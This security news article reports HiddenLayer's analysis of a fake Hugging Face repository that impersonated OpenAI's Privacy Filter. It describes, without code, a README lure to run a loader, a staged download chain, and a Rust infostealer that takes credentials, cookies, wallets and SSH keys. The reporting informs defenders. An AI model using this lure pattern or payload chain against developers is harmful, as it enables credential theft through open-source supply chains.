A malicious repository impersonating OpenAI’s Privacy Filter project pulled in roughly 244,000 downloads and a number one trending position in under 18 hours before being removed.
The repository, “Open-OSS/privacy-filter,” was identified on May 7, 2026, by researchers at HiddenLayer. Hugging Face took the repo down after HiddenLayer reported it.
The lure was simple but effective. The README copied OpenAI’s legitimate Privacy Filter model card nearly verbatim, even keeping the link to OpenAI’s real model card PDF. The only meaningful difference was a single instruction telling users to clone the repo and run start.bat on Windows, with a python loader.py alternative provided for non-Windows systems.
HiddenLayer noted the Linux and macOS instructions appeared to be part of the lure, rather than a separately verified payload path.
According to HiddenLayer’s analysis, the loader.py file silently fetched a PowerShell command from a public JSON paste service, which then downloaded a second-stage batch script disguised as an Edge updater. That script in turn pulled down the final payload: a 1.07 MB Rust-based infostealer with anti-analysis, anti-VM, and anti-debugging protections built in.
The malware targeted browser credentials, session cookies, cryptocurrency wallets, Discord tokens, FileZilla and FTP credentials, and SSH keys. Exfiltrated data was packaged into JSON and posted to an attacker-controlled domain.
Inflated Engagement Points to a Wider Supply-Chain Operation
HiddenLayer believes the download count and 667 “likes” the repo accumulated were largely artificial. It also described the engagement as almost certainly inflated, noting that the accounts followed predictable auto-generated naming patterns.
A subset of those accounts also followed a separate user called anthfu, whose six repositories all contained the same malicious loader.py and reused the same command-retrieval URL.
The infrastructure also overlapped with a separate npm typosquatting campaign documented by security research firm Panther that delivers the WinOS 4.0 (a remote access trojan) implant, suggesting both efforts may be tied to a wider operation targeting open-source ecosystems.
HiddenLayer recommended anyone who cloned the repository and executed start.bat or loader.py treat the host as fully compromised. Reimaging is the suggested fix, followed by rotation of all stored credentials and invalidation of browser sessions.
